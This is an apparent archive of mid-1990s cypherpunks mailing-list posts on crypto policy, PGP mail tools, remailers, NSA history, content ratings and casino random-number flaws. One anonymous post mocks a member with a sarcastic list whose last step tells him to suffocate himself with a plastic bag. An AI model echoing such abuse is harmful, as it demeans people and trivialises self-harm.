>"Gentlemen do not read other gentlemen's mail"

Bzzt. This was said in the Thirties by the twit who closed down the Black 
Chamber.

The quote on the Z. telegram was "Why not give them Califonia as well".

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 26 Jan 1996 10:41:09 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: RANT: cypherpunks do NSA's job for them!!
In-Reply-To: <9601252218.AA12260@alpha>
Message-ID: <199601252238.OAA07065@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



M.M.:

>> when you tell them that "what you are doing breaks the law", you
>> are implicitly revealing that *you*support*that*law*.
>
>That assertion is, I claim vociferously, false.  False false false.

the Tao of bad government: if you really want to get rid of a law, act and
think at all times as if it doesn't even exist.

how do "laws" work? the policeman coming to arrest you is only one
part of the process. the court handing down a decision is another part.

your friends, family, associates, etc. constantly
*reminding* you of that law is the major, critical, unseen mechanism
in propagation of laws.

laws are about perception. the government does not want to arrest everyone
that breaks a law. they do not want to have to enforce laws.
they want the law *not*to*be*broken*. the key way
that is done is through public perception that "doing so-and-so" can't
be done, that it "breaks the law". how is this public perception
propagated? whenever discussion of "so-and-so" is brought up, everyone
verbally thinks, agrees, acts as if, "you can't do so-and-so".

if no one is aware of a law, that law effectively *does*not*exist*.
there are a bazillion laws in the government that are never enforced,
because no one ever thinks of them. 

because everyone affected by it is always thinking about the ITAR, it largely 
does not even need to be enforced. the government has succeeded in
a pavlovian conditioning of the populace whenever any law is 
unchallenged.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 26 Jan 1996 11:35:04 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <199601252239.OAA22005@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>I suspect that John-Doe will go through the normal new-product cycle --
>discovery of bugs, slight improvements, and then better integration of user
>needs. Ultimately, as the product matures, I think that Steve's John Doe
>will be seen as a revolutionary development in privacy equal to (in a far
>less technical but more end-user way) PZ's original PGP. 

I really don't want to blow my own horn, but Private Idaho is much more than
a PGP shell.  It has supported remailer operations since it first appeared
nearly a year ago.  It also started supporting the c2 nym server several
months ago. With no disrespect meant to tallpaul or Steve, I hardly think
John Doe is revolutionary.  I certainly don't consider Private Idaho to be
anything other than an efficient, free shell for Windows users to enhance
their privacy.  And, I have yet to see a crypto/privacy "killer app."

I am glad though, to see that other people are going beyond PGP shells and
starting to write privacy-oriented applications that use the remailers and
nym servers.  Keeps me on my toes with new Private Idaho features.  But more
importantly, the more tools that are out there, the more people will be
using them.

I've always maintained that the interface is the gating factor to the
wide-spread adoption of a technology. 

Joel



 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 05:49:06 +0800
To: cypherpunks@toad.com
Subject: "Gentlemen do not read each other's mail"
Message-ID: <199601251947.OAA16586@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phill refers to the man who said "Gentlemen do not read each other's
mail", (Henry L. Stimson) as a twit.

I highly disagree. In some ways I regard him as our patron saint
(although the man was actually far from saintly and later as a member
of the Roosevelt cabinet adopted an opposite policy of aggressive
signals intelligence.)

Why is he our patron saint? He was a government official coming out
against invasion of privacy. Isn't that what we are all after, in the
end? The reason we deploy cryptography is to assure privacy for
all. We often refer to those who listen in on conversations
(regardless of who they are) as, in some sense, our
opposition. Therefore, is not Stimson's remark in closing down
Yardley's "Black Chamber" to be praised rather than attacked?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Neal" <dneal@electrotex.com>
Date: Fri, 26 Jan 1996 08:51:57 +0800
To: "Erik E. Fair"  (Time Keeper) <cypherpunks@toad.com
Subject: Re: another thought about random numbers
Message-ID: <199601252102.PAA26495@etex.electrotex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Wed, 24 Jan 1996 18:58:27 -0800
> To:            cypherpunks@toad.com
> From:          "Erik E. Fair"  (Time Keeper) <fair@clock.org>
> Subject:       another thought about random numbers

> While musing over a roulette table, and noticing the preponderence of
> electronic games in the various Casinos in Stateline, NV, a thought
> occurred: does anyone know what sorts of random number generators those
> electronic games use, and how (if at all) they are measured and regulated by
> the Nevada Gaming Commission? They might have something to teach us.
> 
> Erik Fair

I cannot speak for what algorithms are used in the devices, but someone made
a low-tech analysis and hack for these machines a while back.  He noticed
that a certain brand of keno machine reseeded its random number generated
with a constant each time power to the machine was lost.  Unfortunately he
hit the same casino three times (the stainless steel rat says always be
prepared to walk away no matter how much is at stake to steal again
another day) and he was forced to divulge his method.  The machine were
consequently fixed.  I doubt those machines use crypto strength RNGs because
who is going to spend the time, energy and money to hack a .25c slot machine?
The payout is too small.   For an excellent real-world example of this try
'The Eudaemonicus Pie.'  Briefly, its a book about people who successfully
hacked roulette machines but at a net loss because of all the time and
energy spent developing their technique.


> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 26 Jan 1996 05:26:10 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <Pine.BSD/.3.91.960125130741.19788A-100000@l0pht.com>
Message-ID: <Pine.SUN.3.91.960125145430.9349D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



It's important to distinguish between what IS the law and what COULD BE 
the law.  And to recall that I at least am not talking here about what 
SHOULD be the law.

On Thu, 25 Jan 1996, Weld Pond wrote:

> At 23:12 1/24/96, Michael Froomkin wrote:
> 
> >If you are a government strategist, you might think, Why not make people
> >strictly liable for, e.g., any crimes planned with their remailers?  And
> >make ISPs strictly liable for crimes panned or executed on their systems?
> 
> But if all traffic is required to be encrypted which is going through the 
> remailer or ISP, how can they be liable for what they cannot possibly 
> know?  This will be the state of the net in a few years.
> 
It's called "strict liability" -- you are liable when you didn't know.  
The economic justification is that you were in the best position to avoid 
the harm (either by doing some checking, or, in this case (they, not I, 
would say) not offering the service at all.

> Can a courier be held liable for delivering encrypted documents that
> contained illegal information or were used in a crime?  I don't think so. 

they are not now, but why couldn't they?  E.g. tell courriers that they 
have a duty not to carry drugs, and must pass all packages by drug 
sniffing dogs?  I don't think that's a good rule, but it's probably 
constitutonal.

> Only if he knew there was something illegal going on.  How are remailers
> any different?
> 
They are not.

> What about a car rental agency that rented a car to a criminal with bogus
> ID that is used to commit a crime.  Was Ryder held liable for the Oklahoma
> bombing? No

It wasn't but that's because we don't have that rule.  the question is 
*could* they be?

. > 
> In these two situations, people are in business and profitting by
> providing a service that can be used to commit crimes. Shouldn't they be
> shut down too if remailers are.  I don't know where the idea got started 
> that the govenment has it within its power to make illegal any new 
> technology that *can* and *is* used to commit crimes.  It is a pretty 
> scary one though.  

No, we are not talking about "should" here.  I, at least, am talking 
about "can they" not "should they".

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Sat, 27 Jan 1996 22:37:53 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <2.2.32.19960125200317.00753dc8@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 AM 1/25/96 -0800, you wrote:
>At 2:13 PM 1/25/96, Clay Olbon II wrote:
>
>>Seriously, this just illustrates the idiocy of banning "hooks" in software.
>>How does one define a "hook"?  Just providing source code could be defined
>>as providing a hook, since a good programmer could then modify it to do
>>crypto.  Also, how about the various kits and tools used to integrate pgp
>>with pine, eudora, etc -- are these not "hooks"?
>
>And yet how many of these programs actually can transparently
>(automatically, push-button, etc.) support PGP? I've been a user of Eudora
>for several years, and have pressed for PGP hooks. The company, Qualcomm,
>once told me it was on their list of things to do, but....
>
>A few years later, still no PGP-in-Eudora. One would think that this would
>be a powerful way of distinguishing their product from other mail packages.
>
>(I understand from this list that Eudora for Windows is now doing this much
>more automatically, that someone has a PGP-in-Eudora package. I don't think
>it was from Qualcomm, but I could be wrong. As a Macintosh version user,
>I'm hoping this comes to the Mac version as well.)

   I think what is going to happen is that Qualcomm will choose S/MIME
instead of PGP, since they are one of the companies listed as jumping on the
band wagon.  

   S/MIME scares me since I believe it to (normally) use weak encryption.
It is gaining in popularity and hype and might be just the product to lull
mass amounts of users into using weak crypto (read government readable).
Microsoft, Banyan, ConnectSoft, Frontier Technologies, Network Computing
Devices, FTP Software, Wollongong, SecureWare Lotus, and others are on the
band wagon as well. 

   From section 2.2 of the S/MIME Implementation Guide published by RSA
   "... U.S. software manufactures have been compelled to incorporate an
   "exportable" content encryption algorithm in order to create a widely
   exportable versions of their product.  "

   "... For outgoing messages, RC2 CBC at 40 bits is the recommended default.
   stronger content encryption is strongly recommended where there is some
   mechanism to indicate that the intended recipient(s) can support it.

   Even though S/MIME allows for any bulk encryption scheme to be used, all
I ever see advertised is DES.  Most companies, including Qualcomm who depend
on government agencies to give them licenses (like FCC dudes), will bend
like a reed in the wind when under pressure.  Follow the money.

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 26 Jan 1996 08:50:13 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <199601252003.PAA08322@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 25, 1996 11:54:46, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
 
> 
>(I understand from this list that Eudora for Windows is now doing this
much 
>more automatically, that someone has a PGP-in-Eudora package. I don't
think 
>it was from Qualcomm, but I could be wrong. As a Macintosh version user, 
>I'm hoping this comes to the Mac version as well.) 
> 
[REPOSTED FROM ALT.PRIVACY.ANON-SERVER] 
> 
>John Doe is a Windows program that makes creating and  
>operating a Nymserver account a *lot* easier 
> 
>A Nymserver allows you to: 
> 
>* Create an address of the form your-choice@alpha.c2.org 
>* Cannot easily be traced back to you 
>* Your Internet Service provider cannot snoop on you 
>* Can post to Usenet and Mailing Lists 
>* Your correspondents do not need to do anything special 
>* Can receive replies addressed to your pseudonym 
> 
>These facilities have been available for some time but  
>John Doe simplifies operation. 
> 
>This is a "try before you buy" version expiring 30 days  
>after installation. The registered version is only 15 
>pounds (UK) that's about $25 (US) 
> 
>More information and a download are available on: 
> 
>http://www.compulink.co.uk/~net-services/jd.htm 
> 
>Steve Harris - Net Services 
> 
 
I then posted to alt.privacy.anon-server the following preliminary review: 
 
I downloaded a trial version of John-Doe and have been playing with it for
a day. 
 
Herewith my initial impressions of it: 
 
Downloading it from the source: as described. easy. 
 
Performing basic installation on my hard disk: essentially automated.
should not trouble or even hassle anyone with even a marginal knowledge of
Windows. 
 
Performing installation as WinsockApp in my Pipeline e-mail software:
moderately easy to impossible. Pipeline uses an odd e-mail system that
automatically fills an empty SUBJECT field with the phrase "[NO SUBJECT]"
that jams everything and caused every test message I sent to bounce back to
me. However, I then downloaded a copy of Eudora Light to use with John-Doe.
This seems to be working. I really hated the need to do this and the extra
hassle but it is not a specific bug in John-Doe. (On the other hand Steve,
since installation programs are constantly being improved even to deal with
other company's brain-damaged software ... Hint, hint, hint...) 
 
Does it work as Steve says: as far as I can tell, yes. 
 
Overall impressions (very preliminary): John-Doe is a classical example of
how elite technology pulls mass technology in its wake. PZ developed PGP
and got it widely out, even if the command line structure kept most people
from learning it. Then other people (penet not included here) developed
Mixmaster etc. tech that worked well but was so complex that only an
estimated 500 people worldwide could use it. Then other people developed
front ends for PGP etc., like PGPSH and Private Idaho. Finally, people like
Steve develop real front ends for the complex tech that puts the ability to
use the previously elite tech in the hands of people who want the earlier
complexity to disappear. 
 
I suspect that John-Doe will go through the normal new-product cycle --
discovery of bugs, slight improvements, and then better integration of user
needs. Ultimately, as the product matures, I think that Steve's John Doe
will be seen as a revolutionary development in privacy equal to (in a far
less technical but more end-user way) PZ's original PGP. 
 
 
 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 26 Jan 1996 06:07:49 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: PGP in Eudora and other mail programs
In-Reply-To: <ad2d0b540b0210044d67@[205.199.118.202]>
Message-ID: <199601252017.PAA26736@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim,

> A few years later, still no PGP-in-Eudora. One would think that this would
> be a powerful way of distinguishing their product from other mail packages.

You clearly haven't looked very hard.  I know that there exist (on
MIT's server, I'm fairly sure) a set of applescripts which interface
MacPGP 2.6.2 with MacEudora 1.5.1 (I think -- I'm not a Mac person so
this may be the wrong Eudora version)

In any event, this integration _does_ exist, and I know it works (from
people who have told me it workss).  I'm not sure how "seamless" it
is, but supposedly it is fairly point-and-click-and-encrypt without
requiring you to cut-and-paste.

Enjoy!

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 26 Jan 1996 07:01:09 +0800
To: <cypherpunks@toad.com
Subject: Re: Secrecy of NSA Affiliation
Message-ID: <9601252043.AA06648@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes: 
> Also, much other evidence points to the NSA having "gone public" much
> farther back in time than 18-30 months ago. Former DIRNSAs on the
> MacNeil-Lehrer Newshour were always introduced as former directors of the
> NSA. As early as the mid-80s, as I recollect. I think Bamford's book pretty
> much outed the name, though it was widely known before that, of course.

Datapoint: My 1967 HB copy of The Codebreakers discusses the 
agency, and includes a photo of the HQ.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 26 Jan 1996 09:16:58 +0800
To: cypherpunks@toad.com
Subject: Re: another thought about random numbers
Message-ID: <199601252156.PAA17976@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>While musing over a roulette table, and noticing the preponderence of
>electronic games in the various Casinos in Stateline, NV, a thought
>occurred: does anyone know what sorts of random number generators those
>electronic games use, and how (if at all) they are measured and regulated
>by the Nevada Gaming Commission? They might have something to teach us.

I don't have a reference, I'm afraid, but I think I remember hearing about
someone using past keno numbers to predict future ones.  When they correctly
guessed all the numbers twice in a row, casino officials stopped the game and
were reluctant to pay (though, I think they eventually did).

Assuming I didn't dream the whole thing, it seems like it wasn't in Nevada...
possibly on an Indian reservation?  I think it happened 6 months to a year
ago.  I'm sorry I can't be more specific.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 27 Jan 1996 17:20:22 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: "This post is G-Rated"
In-Reply-To: <199601252156.NAA28375@netcom6.netcom.com>
Message-ID: <Pine.SOL.3.91.960125154936.1505F-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Bill Frantz wrote:

> ... Discussion of rating systems elided.
> 
> Does anyone have suggestions for achieving the goals of the V-Chip with
> many non-govermental rating agencies?  It seems to me that empowering
> parents would head off the TV/Internet censors.  Any parent who was

THere are several schemes being put about that work along those lines,
with message formats being standardised, but not the actual values - you
should then pick your favourite rating agency, and they determine what is
rated and how.  This system creates a new market for rating agencies, and
it also helps parents to determine more precisely what *they* think is fit
for their children. 

There are pros and cons for both the single set of standard codes, and 
the niche model - a single set is likely to be just a little above the 
lowest common denominator; with niches kids whose parents who pick the CC 
rating agency aren't going to be getting talk.origins in their newsrc 
anytime soon.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 26 Jan 1996 08:44:30 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601251947.OAA16586@jekyll.piermont.com>
Message-ID: <9601252108.AA13595@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Why is he our patron saint? He was a government official coming out
>against invasion of privacy. Isn't that what we are all after, in the
>end?

There is a considerable difference between running a government and being an 
individual. It is not merely ethical for one government to read another's mail, 
it is a duty.

By not taking adequate steps to inform itself of the Japaneese intentions the US 
suffered the loss of a substantial part of the US fleet at Pearl Harbour. Had 
sufficient resources been avaliable the naval codes could have been cracked in 
time.  The closure of the Black chamber was a key reason why US espionage 
efforts were inadequate at the start of WWII.

Given the choice between the US Army and the CIA plus NSA I would choose the 
latter any day. The millitary hardware is useless without intelligence 
operatives. Unless Perry is advocating an absolutist pacifist stance I don't see 
that his stance is credible. I don't know many pacifists who oppose intelligence 
gathering. 

Diplomatic trafic has always been considered fair game. Long may it remain so.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Fri, 26 Jan 1996 07:48:18 +0800
To: cypherpunks@toad.com
Subject: Re: Secrecy of NSA Affiliation
Message-ID: <2.2.16.19960125211323.0ef75aae@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:35 PM 1/25/96 -0800, Timothy C. May wrote:
>At 5:55 PM 1/25/96, Rich Salz wrote:
>
>>Up until recently (18-30 months ago) NSA employees were only allowed
>>to identify themselves as employees of DoD.  It was common knowledge,
>>that unspecific references to Fort Meade meant NSA; and if you saw
>>a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
>>it.
>
>When I attended Crypto '88, nearly 8 years ago, at least several of the NSA
>attendees had "National Security Agency" on their name badges. It may be
>that run-of-the-mill employees still maintain the fiction  for public
>consumption that they are DOD employees, but such was not the case in 1988
>at "Crypto."
>
>(Recall the "NSA Employees Manual" which 2600 liberated, and which Grady
>Ward then redistributed. It had some tips, as I recall, on what employees
>should tell the curious.)
>
>When I visited the D.C. area in early '91 or '92 (I forget which year it
>was), I stopped by Fort Meade to see the place. The sign out front
>prominently said "National Security Agency," complete with the NSA seal (an
>eagle lifting a hacker up in its talons).
>
>Also, much other evidence points to the NSA having "gone public" much
>farther back in time than 18-30 months ago. Former DIRNSAs on the
>MacNeil-Lehrer Newshour were always introduced as former directors of the
>NSA. As early as the mid-80s, as I recollect. I think Bamford's book pretty
>much outed the name, though it was widely known before that, of course.
>
>(I attended my freshman year of high school in Langley, VA. Through the
>woods on one side of the school was CIA headquarters. At that time, 1967,
>it was still only labelled as something like "Department of Transportation
>Road Testing Facility." Everyone knew what it really was, of course. Rick
>Smith, on this list, was a classmate of mine and can attest to this. The
>CIA "went public" in the early 70s, the NSA in the early 80s, the NRO in
>the early 90s...I sense a pattern. This means the ultra-secret ERO
>(Extraterrestrial Research Organization) will be outed in the opening years
>of the next decade.)
>
>--Tim May
>
>
>Boycott espionage-enabled software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^756839 - 1  | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>
>
Phrack actualy published the manual. I have a local copy if anyone is
interested.
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 26 Jan 1996 09:50:39 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: RANT: cypherpunks do NSA's job for them!!
In-Reply-To: <ad2bf34e04021004d2fa@[205.199.118.202]>
Message-ID: <9601252218.AA12260@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri writes:
 > when you tell them that "what you are doing breaks the law", you
 > are implicitly revealing that *you*support*that*law*.

That assertion is, I claim vociferously, false.  False false false.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Fri, 26 Jan 1996 02:01:32 +0800
To: Anthony Naggs <tnaggs@cddotdot.mikom.csir.co.za>
Subject: Re: UK newspaper names Zimmermann a "neo-Nazi sympathiser"
In-Reply-To: <m0tfMNS-000VVkC@cddotdot.mikom.csir.co.za>
Message-ID: <Pine.SUN.3.91.960125162221.5811L-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

Can someone out there send me a copy of the ST article on Zimmermann?  
I'm currently too busy with marking to bother buying newspapers.

Many thanks,

Sean Gabb,
Editor
Free Life.

======================================================================
    $$$$$$  $$$$$   $$$$$$  $$$$$$     $$      $$   $$$$$$  $$$$$$
    $$      $$   $  $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$$$    $$$     $$$$    $$$$       $$      $$   $$$$    $$$$
    $$      $$ $    $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$      $$   $  $$$$$$  $$$$$$     $$$$$$  $$   $$      $$$$$$
 
        A Journal of Classical Liberal and Libertarian Thought

    Production:                                   Editorial:
    c/o the Libertarian Alliance                  123a Victoria Way
    25 Chapter Chambers                           Charlton
    London SW1P 4NN                               London SE7 7NX

Tel: **181 858 0841  Fax: **171 834 2031  E-mail: cea01sig@gold.ac.uk

                    EDITOR OF FREE LIFE:  SEAN GABB
______________________________________________________________________

How to subscribe:  Send cheque for GBP10 or US$20 made out to the
                   Libertarian Alliance.
======================================================================
                 FOR LIFE, LIBERTY AND PROPERTY
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Sat, 27 Jan 1996 17:16:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601260025.QAA27228@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


At 01:44 PM 1/25/96 -0800, "Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

>it really bugs me how much cypherpunks try to point out the "gotchas" in all
>the laws with crypto. when we become *experts* on these laws, and
>tell people why they prevent them from doing various things, we
>are actually *supporting* them.

It's not often we see an active and overt defense of ignorance.  Good work, Vladimir!  But to really avoid being contaminated by evil knowledge, I recommend the following 12-step program:

1.  Admit that you are powerless to get a clue. Print out this message for reference.

2.  Unsubscribe from Cypherpunks, and all other sources of information that might be relevant.

3.  Unsubscribe from all sources of information that probably aren't relevant, to avoid hostile agents forcing you into unwitting coercion.

4.  Read William S. Burroughs books until you begin to see your neighbors as giant cockroaches and slugs.

4a. In the event that you already see them this way, read Burroughs until they look like something else.

5.  Join as many religions as possible, so that you have incompatible memes busily protecting you from facts.

<steps 6 through 11 deleted until receipt of a note delivered by the proper techniques, to be beamed into your mind later>

12. Seal your head in a plastic bag until you suffocate.

This will protect you from such problems in the future.

Hope this helps!

Signed,
A Friend








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 26 Jan 1996 08:32:12 +0800
To: Jeff Williams <williams@va.arca.com>
Subject: Re: V-chip?
In-Reply-To: <65534.297195739@va.arca.com>
Message-ID: <Pine.SUN.3.91.960125162627.28878B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Jan 1996, Jeff Williams wrote:

> Tim May writes:
> 
> > Anyone telling me I have to rate my work, or submit it to a ratings agency,
> > is aggressing against me. Now, if others rate my work (which is already
> > happening with digest services such as "CP-Lite"), this is their business,
> > not mine. But the V-Chip precedent is a precedent for the government to
> > insist that all sorts of content be rated. This should be fought in a free
> > society.
> 
> But what if they *ask* you nicely to label your work?
> 
>   "If you think your message is offensive, violent, or racist,
>    would you please consider labelling it?"
> 
> I don't think I'd mind.  In fact, *optional* labels would make me more likely
> to post such material, because I'd have some confidence that it would only be
> read by people who want to read it. (And they could even find it more
> quickly!)
[...commentary on labeling deleted...]

The problem is that labeling which begins as voluntary often has other 
consequences... for example, the voluntary labeling in the music 
industry. Although it's voluntary labeling, one state (Washington, I 
believe) at one point nearly passed (or possibly did pass - I can't 
remember) legislation making it illegal to sell labeled albums to minors.

The label itself, of course, was still voluntary.

I'm not opposed to *truly* and *permanantly* voluntary labeling; I'm just 
afraid of such labeling becoming permanant and mandatory...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 26 Jan 1996 08:37:25 +0800
To: Michael Froomkin <weld@l0pht.com>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <2.2.32.19960125213709.006da5ec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:58 PM 1/25/96 -0500, Michael Froomkin wrote:
 
>It's called "strict liability" -- you are liable when you didn't know.  
>The economic justification is that you were in the best position to avoid 
>the harm (either by doing some checking, or, in this case (they, not I, 
>would say) not offering the service at all.

Vague memories of Law School... Doesn't strict liability apply to
"inherently dangerous activities."  Like using explosives to demolish
buildings or something.  Is carrying message traffic an inherently dangerous
activity?  Any strict liability situations today not involving inherently
dangerous activity?

I suppose having disposed of waste in a "Superfund Site" leads to automatic
liability but does not necessarily involve an inherently dangerous activity.
Is this a "strict liability" situation?  I'm trying to think of other sorts
of examples.

DCF

"If we're so poor these days, why do we have more of everything?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 26 Jan 1996 12:46:13 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601252139.QAA16761@jekyll.piermont.com>
Message-ID: <Pine.ULT.3.91.960125162115.11995F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Perry E. Metzger wrote:

> hallam@w3.org writes:
> > There is a considerable difference between running a government and
> > being an individual. It is not merely ethical for one government to
> > read another's mail, it is a duty.
> 
> I am a funny sort of person. I don't believe that governments should
> be able to do anything that individuals cannot. If it is bad for me to
> steal, it is also bad for a government official to steal. If it is bad
> for me to listen in on my neighbor's phone calls, it is bad for the
> government, too.

Er, I believe the above was clearly intended to mean "for one government
to read another government's mail." 

...
> I do not mean to pretend that there is an absolute ethics. I merely
> claim that I do not find in my mind an easy distinction between the
> acts of a government official under color of authority and the acts of
> any other individual.

How about:

It is the ethical duty of a responsible government to read other 
government's mail, absent any treaties or gentlemen's agreements to the 
contrary.

It is the ethical duty of a responsible government not to read its own 
citizens' mail without specific probable cause that a crime has occurred 
or is imminent.

It is the ethical duty of responsible citizens to read their own
government's mail, to ensure that their government is behaving ethically. 

The knotty bits concern how much of its own mail the government needs to
disclose, because you can't really disclose it to your own citizens
without effectively disclosing it to the whole world. And how much the 
government can lie, cheat, and steal in purely international affairs. I'd 
answer "a lot" to both.

-rich
 Fucking Statist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 08:31:43 +0800
To: hallam@w3.org
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <9601252108.AA13595@zorch.w3.org>
Message-ID: <199601252139.QAA16761@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> There is a considerable difference between running a government and
> being an individual. It is not merely ethical for one government to
